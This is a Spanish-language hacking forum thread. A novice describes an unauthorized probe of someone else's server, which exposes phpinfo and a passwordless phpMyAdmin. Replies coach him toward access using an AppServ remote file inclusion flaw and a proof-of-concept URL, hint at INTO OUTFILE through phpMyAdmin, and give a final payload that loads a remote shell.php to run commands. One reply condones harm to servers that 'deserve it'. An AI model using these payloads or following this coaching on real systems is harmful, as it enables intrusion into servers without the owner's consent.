Hola a todos, muy lindo este foro, por eso creo que encontraré aquí quien me de una ayudita o consejo.

Explorando un server recogí los siguientes datos:
• c:\appserv\www\      es donde tiene la web
• Puedo ver el phpinfo
(Apache/1.3.34 (Win32) PHP/4.4.1)

• Pero lo que más me intriga es que tambien puedo acceder al phpmyadmin y éste está sin pass, osea que tengo privilegios de admin alli.

Pero mi objetivo es muy simple, no quiero hacer ningún daño, ni cambiar nada. Sólo quiero ver los archivos que están en el index
Porque en otros directorios (por ejemplo www.site.com/IMAGES) puedo ver lo que hay pero en www.site.com/ <--- aqui lo proteje con un index.html

Yo quisiera ver si hay phps ahi u otros files, entonces pido que me orienten y me digan si con los datos que cuento puedo hacerlo. Ya que no quiero tocar nada en el phpmyadmin por no hacer algún daño sin darme cuenta.

Desde ya muchas gracias a quien conteste por molestarse en leer las cuestiones de un novato.

Gracias

Antes que nada muchas gracias por responderme


Tiene estas bd:

information_schema (16)
forum (96)
mysql (17)
test (-)

La única que veo que se realcione con el site es forum ya que el sitio tiene un foro vBulletin en www.site.com/foro/
Pero el foro no me interesa, no quiero ver nada alli sino que tengo interés en los php y files sueltos alojados en www.site.com/   osea un index de lo que hay en appserv\www\

PD: si necesitas mas datos te los doy

Te agradezco mucho tu respuesta...

No entiedo mucho lo que tengo que hacer. Entonces voy a ponerme a leer los tutoriales del foro, depaso aprendo algo.
 En el transcurso de mis lecturas supongo que me iran surgiendo dudas, pero qué bueno que caí a este foro donde son tan amables de explicarle a un novato.

Muchas gracias.

PD: espero que miestras esté aprendiendo estos métodos no cambien el server y pongan el phpmyadmin con password jaja.

Bueno, he hecho lo que debí haber hecho desde un principio... instalarme el paquete appserv de la misma version... jejejje bueno algunos tardamos en darnos cuenta.
Estuve probando con algunas vulns que fui encontrando. PEro me faltan conocimientos para ello lamentablemente.
Pongo unos ejemplos sacados del fantástico SECURITYFOCUS

El que estoy tratando de saber como funciona es este
"AppServ Open Project Remote File Include Vulnerability"
h*tp://www.securityfocus.com/bid/16166/info

El "proof of concept" sería este

http://example/appserv/main.php?appserv_root=http://example/

Lo pruebo y veo que hay algo totalmente explotable en ese directorio maldito appserv expuesto en esta clase de servers. Y además ya aprendi que si un server tiene ese directorio tambien por defecto tiene expuesto el phpmyadmin.
Asique ahora estoy intentando saber qué es y como usar la técnica File Include

Incluso lo que saco en claro como novato que soy es que ya de por sí visitando http://example/appserv/main.php ya nos tira un error de php y además muestra el directorio de instalación y la unidad que seguramente para gente experimentada como los que me contestaron aquí es und ato muy valioso. En resume el error es este:

Warning: main(/lang-english.php): failed to open stream: No such file or directory in c:\appserv\www\appserv\main.php on line 27

Warning: main(): Failed opening '/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in c:\appserv\www\appserv\main.php on line 27

Tengo que aprender el file include, algo creo saber de que se trata. Dice que puedo usar o ejecutar un codigo remto de php, a veces piendo que puede ser www.site.comm/appserv/main.php?appserv_root?=URL/codigophp.php ... estoy muy equivocado?????

También vi otro expoit: the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.

Que en este caso ya tendria que meter mano en el phpmyadmin que es más parecido al que pusieron antes aquí
h*tp://www.securityfocus.com/archive/1/381514
the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.

Por todo muchas gracias y estoy aprendiendo mucho GRACIAS A USTEDES!!

Bueno, aunque ya resolviste el problema..

File Include, te debes referir a "Remote File Inclusion", buscalo asi en internet.

lo de INTO OUTFILE, pues es lo mismo que yo te decia, solo que tu hiciste la tabla

Saludos!!

aja pero exatamente como es el codigo que debo usar en el quiero hacer lo mismo pero no entiendo tengo que hacer un php ? con select... o que ?

Mi consejo, ya que te veo tan desorientado como lo estaba yo es que, primero hagas un buena investigación sobre la vulns o los xploits sobre appserv.  Segundo, y fundamental, que te instales el paquete appserv en tu pc, esto es fundamental para aprender como funciona y para hacer los ensayo del ataque que vayas a hacer.
3ro Es que el código que vayas a poner sea el que comprendas bien y el que te sirva para tus fines, hay muchas paginas con scripts php para lo que necesites. Fijate en los avisos de securityfocus que puse arriba que están bien explícitos y desarrollados.
Y por último nada se consigue si no le pones esfuerzo y aunque empieces de 0 tienes que leero todo lo que puedas; y no vallas a hacer nada malo en el server que te metas, salvo que lo merezcan.

@headshot
debes agregar a la url c=[ALGO A EJECUTAR]

por ejemplo

http://ejemplo/appserv/main.php?c=dir&appserver_root=http://ejemplo/shell.php

Saludos!!